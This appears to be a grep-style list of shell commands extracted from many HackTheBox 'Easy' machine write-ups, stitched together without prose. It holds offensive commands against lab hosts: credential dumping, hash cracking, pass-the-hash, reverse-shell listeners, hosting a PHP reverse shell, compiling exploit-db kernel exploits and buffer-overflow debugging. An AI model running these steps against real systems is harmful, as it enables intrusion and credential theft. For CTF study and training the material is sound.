# ip=10.10.14.48 port=9005 course=2 Easy/26.html: λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Teacher] → nc -lvnp 9005 Easy/26.html: → hash-identifier Easy/11.html: λ nihilist [ 10.10.14.48/23 ] [~] → nmap -sC -sV 10.10.10.40 Easy/28.html: → nmap -F 10.10.10.123 Easy/28.html: → nmap -sC -sV 10.10.10.123 -p 21,22,53,80,139,443,445 Easy/28.html: λ root [ 10.10.14.48/23 ] [/home/nihilist/_HTB] → smbmap -H 10.10.10.123 -p 445,139 Easy/28.html:→ enum4linux 10.10.10.123 Easy/28.html:→ smbclient \\\\10.10.10.123\\general Easy/28.html:→ mv creds.txt Friendzone/creds.txt Easy/28.html:→ mkdir Friendzone Easy/28.html:→ mv creds.txt Friendzone/creds.txt Easy/28.html:→ cd Friendzone Easy/28.html:→ cat creds.txt Easy/28.html: → nmap 10.10.10.123 --script smb-enum-shares Easy/28.html: λ root [ 10.10.14.48/23 ] [/home/nihilist/_HTB] → pacman -S blackarch/python2-dnsknife Easy/28.html: λ root [ 10.10.14.48/23 ] [/home/nihilist/_HTB] → dig axfr @10.10.10.123 friendzone.red Easy/28.html: λ root [ 10.10.14.48/23 ] [/home/nihilist/_HTB] → smbclient -H //10.10.10.123/Development Easy/28.html:λ root [ 10.10.14.48/23 ] [/home/nihilist/_HTB] → nc -lvnp 9001 Easy/28.html: λ root [ 10.10.14.48/23 ] [/home/nihilist/_HTB] → nc -lvnp 9001 Easy/36.html: → nmap -F 10.10.10.149 Easy/36.html: → nmap -sCV -p80,135,445 10.10.10.149 Easy/36.html: → git clone https://github.com/theevilbit/ciscot7 Easy/36.html: → cd ciscot7 Easy/36.html: → ls [21af318] Easy/36.html: → python ciscot7.py -p 0242114B0E143F015F5D1E161713 [21af318] Easy/36.html: → python ciscot7.py -p 02375012182C1A1D751618034F36415408 [21af318] Easy/36.html: → echo '$1$pdQG$o8nrSzsGXeaduXrjlvKc91' >> cis.md5 [21af318] Easy/36.html: → cat cis.md5 [21af318] Easy/36.html: → hashcat -m 500 [21af318] Easy/36.html: → hashcat -m 500 cis.md5 /usr/share/wordlists/rockyou.txt [21af318] Easy/36.html:→ nano users.txt Easy/36.html:→ nano pass.txt Easy/36.html:→ crackmapexec smb 10.10.10.149 -u users.txt -p pass.txt Easy/36.html: → msfdb init Easy/36.html: → msfconsole Easy/36.html:→ locate psexec.py Easy/36.html:→ cd /usr/share/doc/python3-impacket/examples/ Easy/36.html:→ ls Easy/36.html:→ python3 lookupsid.py 'hazard:stealth1agent'@10.10.10.149 Easy/36.html: → python3 lookupsid.py 'hazard:stealth1agent'@10.10.10.149 Easy/36.html: → crackmapexec smb 10.10.10.149 -u users.txt -p pass.txt Easy/36.html: → git clone https://github.com/Hackplayers/evil-winrm Easy/36.html: → cd evil-winrm Easy/36.html: → cat Gemfile [e501272] Easy/36.html: → gem install winrm winrm-fs stringio [e501272] Easy/36.html: → sudo !! [e501272] Easy/36.html: → sudo gem install winrm winrm-fs stringio [e501272] Easy/36.html: → ruby evil-winrm.rb -u chase -p 'Q4)sJu\Y8qz*A3?d' -i 10.10.10.149 [e501272] Easy/36.html: → wget https://download.sysinternals.com/files/SysinternalsSuite.zip Easy/36.html: → mv ~/Downloads/SysinternalsSuite.zip . Easy/36.html: → unzip SysinternalsSuite.zip Easy/36.html: → strings firefox.exe_200218_153036.dmp | grep pass [e501272] Easy/36.html: → crackmapexec smb 10.10.10.149 -u users.txt -p pass.txt --shares Easy/36.html:→ python3 psexec.py administrator@10.10.10.149 Easy/31.html: → nmap -F 10.10.10.134 Easy/31.html: → nmap -sCV -p22,135,139,445 10.10.10.134 Easy/31.html: λ root [ 10.10.14.48/23 ] [nihilist/_HTB/] → smbclient -L //10.10.10.134/ -U "" Easy/31.html: → smbclient //10.10.10.134/Backups Easy/31.html: λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Bastion] → cat note.txt Easy/31.html:→ mount -t cifs //10.10.10.134/Backups mount Easy/31.html:→ ls && cd mount Easy/31.html:→ ls Easy/31.html: → smbmap -u nihilist -H 10.10.10.134 Easy/31.html: → ls Easy/31.html: → ls Easy/31.html: → du -hs WindowsImageBackup Easy/31.html: → cd WindowsImageBackup Easy/31.html: → cd L4mpje-PC Easy/31.html: → ls Easy/31.html: → cd Backup\ 2019-02-22\ 124351 Easy/31.html: → du -hs * Easy/31.html: → guestmount Easy/31.html: → apt install libguestfs-tools && guestmount --help Easy/31.html: → mkdir /home/nihilist/_HTB/Bastion/vhd Easy/31.html: → guestmount --add 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd --inspector --ro -v /home/nihilist/_HTB/Bastion/vhd Easy/31.html: → cd /home/nihilist/_HTB/Bastion Easy/31.html: → cd vhd Easy/31.html: → ls Easy/31.html:→ find Desktop Documents Downloads -ls Easy/31.html: → cd ../.. Easy/31.html: → cd Windows/System32/config Easy/31.html: → ls Easy/31.html: → cp SAM SYSTEM /home/nihilist/_HTB/Bastion Easy/31.html: → cd ../../../.. Easy/31.html: → ls Easy/31.html: → file SAM SYSTEM Easy/31.html: → mkdir backup && mv SAM backup/ && mv SYSTEM backup/ Easy/31.html: → cd backup Easy/31.html: → ls Easy/31.html: → impacket-secretsdump -sam SAM -system SYSTEM local Easy/31.html:→ smbmap -u L4mpje -p aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9 -H 10.10.10.134 Easy/31.html:→ ssh L4mpje@10.10.10.134 Easy/31.html: → cd vhd Easy/31.html: → ls Easy/31.html: → cd Windows/System32/config Easy/31.html: → ls -lash | grep SAM Easy/31.html: → ls -lash | grep SYSTEM Easy/31.html: → cd ../../.. Easy/31.html: → cd .. Easy/31.html: → curl -sk https://raw.githubusercontent.com/411Hall/JAWS/master/jaws-enum.ps1 > jaws-enum.ps1 Easy/31.html: → ifconfig | grep inet Easy/31.html: → python -m SimpleHTTPServer 8080 Easy/31.html:→ curl -sk https://raw.githubusercontent.com/haseebT/mRemoteNG-Decrypt/master/mremoteng_decrypt.py > mremoteng.py Easy/31.html:→ python3 mremoteng.py Easy/31.html: → python3 mremoteng.py -s yhgmiu5bbuamU3qMUKc/uYDdmbMrJZ/JvR1kYe4Bhiu8bXybLxVnO0U9fKRylI7NcB9QuRsZVvla8esB Easy/31.html: → python3 mremoteng.py -s aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw== Easy/31.html:→ ssh Administrator@10.10.10.134 Easy/31.html: → ssh Administrator@10.10.10.134 Easy/15.html: λ nihilist [ 10.10.14.48/23 ] [~] → nmap -sC -sV 10.10.10.68 Easy/15.html: λ nihilist [ 10.10.14.48/23 ] [~] → dirb http://10.10.10.68/ Easy/15.html:λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Bashed] → nano rev.php Easy/15.html:λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Bashed] → cat rev.php Easy/15.html:λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Bashed] → python2 -m SimpleHTTPServer 80 Easy/15.html: λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Bashed] → nc -lvnp 9001 Easy/15.html: λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Bashed] → curl -vsk http://10.10.10.68/uploads/rev.php Easy/15.html: λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Bashed] → nc -lvnp 9001 Easy/15.html: λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Bashed] → searchsploit kernel 4.4 Easy/15.html: λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Bashed] → locate 44298.c Easy/15.html:λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Bashed] → cp /usr/share/exploitdb/exploits/linux/local/44298.c . Easy/15.html:λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Bashed] → gcc -o 44298 -m64 44298.c Easy/15.html:λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Bashed] → ls Easy/15.html:λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Bashed] → python2 -m SimpleHTTPServer 80 Easy/22.html: → nmap 10.10.10.98 -F Easy/22.html:→ nmap -sCV 10.10.10.98 Easy/22.html:→ ftp 10.10.10.98 Easy/22.html:→ 7z x Access\ Control.zip Easy/22.html:→ ls Easy/22.html:→ file backup.mdb Easy/22.html: → 7z x Access\ Control.zip -paccess4u@security Easy/22.html: → ls Easy/22.html: → file Access\ Control.pst Easy/22.html: λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Access] → telnet 10.10.10.98 Easy/16.html: λ nihilist [ 10.10.14.48/23 ] [~] → nmap -sC -sV 10.10.10.75 Easy/16.html: λ nihilist [ 10.10.14.48/23 ] [~] → curl -vsk http://10.10.10.75/ Easy/16.html: λ nihilist [ 10.10.14.48/23 ] [~] → dirb http://10.10.10.75/nibbleblog/ Easy/16.html:λ nihilist [ 10.10.14.48/23 ] [~] → searchsploit Nibbleblog 4.0.3 Easy/16.html: λ nihilist [ 10.10.14.48/23 ] [~] → msfconsole Easy/33.html: → nmap -F 10.10.10.138 Easy/33.html:→ nmap -sCV -p80 10.10.10.138 Easy/33.html: → echo '10.10.10.138 writeup.htb' >> /etc/hosts Easy/33.html: → curl -sk http://writeup.htb/ Easy/33.html: → dirsearch -u http://writeup.htb/ -e txt,php,html,js -t 50 Easy/33.html: → dirsearch -u http://writeup.htb/ -e txt,php,html,js -t 50 Easy/33.html: → nikto -h http://10.10.10.138/ Easy/33.html: → curl -sk http://10.10.10.138/robots.txt Easy/33.html: → curl -sk http://10.10.10.138/writeup/ | grep CMS Easy/33.html:→ searchsploit CMS Made Simple | grep Injection Easy/33.html:→ locate 46635.py Easy/33.html:→ cp /usr/share/exploitdb/exploits/php/webapps/46635.py . Easy/33.html:→ nano 46635.py Easy/33.html:→ python 46635.py -u http://10.10.10.138/writeup --crack -w /usr/share/wordlists/rockyou.txt Easy/33.html: → ssh jkr@writeup.htb Easy/33.html:→ cat nihilist.py Easy/33.html:→ python -m SimpleHTTPServer 8080 Easy/33.html:→ nc -lvnp 1234 Easy/33.html: → ssh jkr@10.10.10.138 Easy/33.html:→ nc -lvnp 1234 Easy/35.html: → nmap -F 10.10.10.147 --top-ports 10000 -vvv Easy/35.html: → nmap -sCV -p22,80,1337 10.10.10.147 Easy/35.html: → nikto -h http://10.10.10.147/ Easy/35.html: → dirsearch -u http://10.10.10.147/ -e php,html,txt,js Easy/35.html: → ls Easy/35.html: → file myapp Easy/35.html: → chmod +x myapp Easy/35.html: → gdb ./myapp Easy/35.html:→ wget -q -O- https://github.com/hugsy/gef/raw/master/scripts/gef.sh | sh Easy/35.html:→ gdb -q myapp Easy/35.html:$rcx : 0x00007ffff7edc904 → 0x5477fffff0003d48 ("H="?) Easy/35.html:$rdx : 0x00007ffff7fad580 → 0x0000000000000000 Easy/35.html:$rsp : 0x00007fffffffe438 → "AAAAAAAA" Easy/35.html:$rsi : 0x00000000004052a0 → "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]" Easy/35.html:$rip : 0x00000000004011ac → <****main+77> ret Easy/35.html:$r12 : 0x0000000000401070 → <_start+0> xor ebp, ebp Easy/35.html:$r13 : 0x00007fffffffe510 → 0x0000000000000001 Easy/35.html:0x00007fffffffe448│+0x0010: 0x00007fffffffe518 → 0x00007fffffffe774 → "/home/nihilist/_HTB/Safe/Ghidra/myapp" Easy/35.html:0x00007fffffffe458│+0x0020: 0x000000000040115f → <****main+0> push rbp Easy/35.html:0x00007fffffffe470│+0x0038: 0x0000000000401070 → <_start+0> xor ebp, ebp Easy/35.html: → 0x4011ac <****main+77> ret Easy/35.html:[#0] 0x4011ac → main() Easy/35.html:$rcx : 0x00007ffff7edc904 → 0x5477fffff0003d48 ("H="?) Easy/35.html:$rdx : 0x00007ffff7fad580 → 0x0000000000000000 Easy/35.html:$rsp : 0x00007fffffffe438 → "paaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaava[...]" Easy/35.html:$rsi : 0x00000000004052a0 → "aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaaga[...]" Easy/35.html:$rip : 0x00000000004011ac → <****main+77> ret Easy/35.html:$r12 : 0x0000000000401070 → <_start+0> xor ebp, ebp Easy/35.html:$r13 : 0x00007fffffffe510 → 0x0000000000000001 Easy/35.html: → 0x4011ac <****main+77> ret Easy/35.html:[#0] 0x4011ac → main() Easy/35.html:$rcx : 0x00007ffff7edc904 → 0x5477fffff0003d48 ("H="?) Easy/35.html:$rdx : 0x00007ffff7fad580 → 0x0000000000000000 Easy/35.html:$rsp : 0x00007fffffffe438 → "paaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaava[...]" Easy/35.html:$rsi : 0x00000000004052a0 → "aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaaga[...]" Easy/35.html:$rip : 0x00000000004011ac → <****main+77> ret Easy/35.html:$r12 : 0x0000000000401070 → <_start+0> xor ebp, ebp Easy/35.html:$r13 : 0x00007fffffffe510 → 0x0000000000000001 Easy/35.html: → python -c 'print "X"*128 + "Y"*8 + "Z"*8' Easy/35.html: $rcx : 0x00007ffff7edc904 → 0x5477fffff0003d48 ("H="?) Easy/35.html: $rdx : 0x00007ffff7fad580 → 0x0000000000000000 Easy/35.html: $rsp : 0x00007fffffffe438 → "XXXXXXXXYYYYYYYYZZZZZZZZ" Easy/35.html: $rsi : 0x00000000004052a0 → "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX[...]" Easy/35.html: $rip : 0x00000000004011ac → <****main+77> ret Easy/35.html: $r12 : 0x0000000000401070 → <_start+0> xor ebp, ebp Easy/35.html: $r13 : 0x00007fffffffe510 → 0x0000000000000001 Easy/35.html:→ nano exploit.py Easy/35.html: $rsp : 0x00007fff98990520 → 0x0000000000000001 Easy/35.html: $rip : 0x00007fd2a202e090 → <_start+0> mov rdi, rsp Easy/35.html: 0x00007fff98990528│+0x0008: 0x00007fff98992748 → 0x00707061796d2f2e ("./myapp"?) Easy/35.html: 0x00007fff98990538│+0x0018: 0x00007fff98992750 → "APPDIR=/tmp/.mount_tmtxDoJV" Easy/35.html: 0x00007fff98990540│+0x0020: 0x00007fff9899276c → "APPIMAGE=/tmp/tm" Easy/35.html: 0x00007fff98990548│+0x0028: 0x00007fff9899277d → "COLORTERM=truecolor" Easy/35.html: 0x00007fff98990550│+0x0030: 0x00007fff98992791 → "DISPLAY=:0.0" Easy/35.html: 0x00007fff98990558│+0x0038: 0x00007fff9899279e → "HOME=/root" Easy/35.html: → 0x7fd2a202e090 <_start+0> mov rdi, rsp Easy/35.html: [#0] 0x7fd2a202e090 → _start() Easy/35.html: $rax : 0x000000000040115f → <****main+0> push rbp Easy/35.html: $rcx : 0x00007fd2a2007718 → 0x00007fd2a2009a40 → 0x0000000000000000 Easy/35.html: $rdx : 0x00007fff98990538 → 0x00007fff98992750 → "APPDIR=/tmp/.mount_tmtxDoJV" Easy/35.html: $rsp : 0x00007fff98990440 → 0x00000000004011b0 → <__libc_csu_init+0> push r15 Easy/35.html: $rbp : 0x00007fff98990440 → 0x00000000004011b0 → <__libc_csu_init+0> push r15 Easy/35.html: $rsi : 0x00007fff98990528 → 0x00007fff98992748 → 0x00707061796d2f2e ("./myapp"?) Easy/35.html: $rip : 0x0000000000401163 → <****main+4> sub rsp, 0x70 Easy/35.html: $r8 : 0x00007fd2a2009a50 → 0x0000000000000004 Easy/35.html: $r9 : 0x00007fd2a203c780 → <_dl_fini+0> push rbp Easy/35.html: $r12 : 0x0000000000401070 → <_start+0> xor ebp, ebp Easy/35.html: $r13 : 0x00007fff98990520 → 0x0000000000000001 Easy/35.html: 0x00007fff98990440│+0x0000: 0x00000000004011b0 → <__libc_csu_init+0> push r15 ← $rsp, $rbp Easy/35.html: 0x00007fff98990448│+0x0008: 0x00007fd2a1e74bbb → <__libc_start_main+235> mov edi, eax Easy/35.html: 0x00007fff98990458│+0x0018: 0x00007fff98990528 → 0x00007fff98992748 → 0x00707061796d2f2e ("./myapp"?) Easy/35.html: 0x00007fff98990468│+0x0028: 0x000000000040115f → <****main+0> push rbp Easy/35.html: → 0x401163 <****main+4> sub rsp, 0x70 Easy/35.html: [#0] 0x401163 → main() Easy/35.html:→ 0x401163 <****main+4> sub rsp, 0x70 Easy/35.html:→ objdump -D myapp | grep -i system Easy/35.html: → objdump -D myapp | grep -i test Easy/35.html: → nano exploit.py Easy/35.html: → python3 exploit.py Easy/35.html:→ ssh-keygen -f safe Easy/35.html:→ chmod 600 safe Easy/35.html:→ cat safe.pub Easy/35.html: → scp -i ../Ghidra/safe user@10.10.10.147:MyPasswords.kdbx . Easy/35.html: → scp -i ../Ghidra/safe user@10.10.10.147:IMG_0547.JPG . Easy/35.html: → ls Easy/35.html: → file MyPasswords.kdbx Easy/35.html: → file IMG_0547.JPG Easy/35.html:→ /usr/sbin/keepass2john MyPasswords.kdbx | sed "s/MyPasswords/IMG_0547.JPG/g" Easy/35.html:→ /usr/sbin/keepass2john MyPasswords.kdbx | sed "s/MyPasswords/IMG_0547.JPG/g" > keepass_hash Easy/35.html: → john -w:/usr/share/wordlists/rockyou.txt keepass_hash Easy/5.html:**λ nihilist [nihilist/_HTB/Optimum] → nmap -sC -sV 10.10.10.8** Easy/5.html: **λ root [nihilist/_HTB/Optimum] → nikto -h http://10.10.10.8/** Easy/5.html: **λ root [nihilist/_HTB/Optimum] → searchsploit rejetto** Easy/34.html: → nmap -F 10.10.10.115 Easy/34.html: → nmap -sCV -p22,80 10.10.10.115 Easy/34.html:→ echo "10.10.10.115 haystack.htb" >> /etc/hosts Easy/34.html: → dirsearch -u http://10.10.10.115/ -t 50 -e txt,php,html,js Easy/34.html:→ nikto -h http://haystack.htb/ Easy/34.html: → curl -sk http://haystack.htb/robots.txt | grep nginx Easy/34.html: → wget http://haystack.htb/needle.jpg Easy/34.html: → exiftool needle.jpg Easy/34.html: → strings needle.jpg Easy/34.html: → echo "bGEgYWd1amEgZW4gZWwgcGFqYXIgZXMgImNsYXZlIg==" | base64 -d Easy/34.html: → nmap -F 10.10.10.115 --top-ports 10000 -vvv Easy/34.html: → nmap -sCV -p9200 10.10.10.115 Easy/34.html: → curl -sk http://haystack.htb:9200 Easy/34.html: → curl -sk http://haystack.htb:9200/_cat/indices/\?v Easy/34.html:→ curl -X POST http://haystack.htb:9200/\/_search Easy/34.html:→ curl -X POST http://haystack.htb:9200/bank/_search Easy/34.html:→ npm install elasticdump -g Easy/34.html:→ elasticdump --input=http://10.10.10.115:9200/quotes --output=quotes.json --type=data Easy/34.html: → cat quotes.json| grep clave Easy/34.html: → echo "cGFzczogc3BhbmlzaC5pcy5rZXk=" | base64 -d Easy/34.html: → echo "dXNlcjogc2VjdXJpdHkg" | base64 -d Easy/34.html: → ssh security@haystack.htb Easy/34.html:→ nano nihilist.js Easy/34.html:→ python -m SimpleHTTPServer 8080 Easy/34.html:→ cat nihilist.js Easy/34.html:→ nc -lvnp 9001 Easy/34.html:→ nc -lvnp 9001 Easy/34.html: → nc -lvnp 9002 `**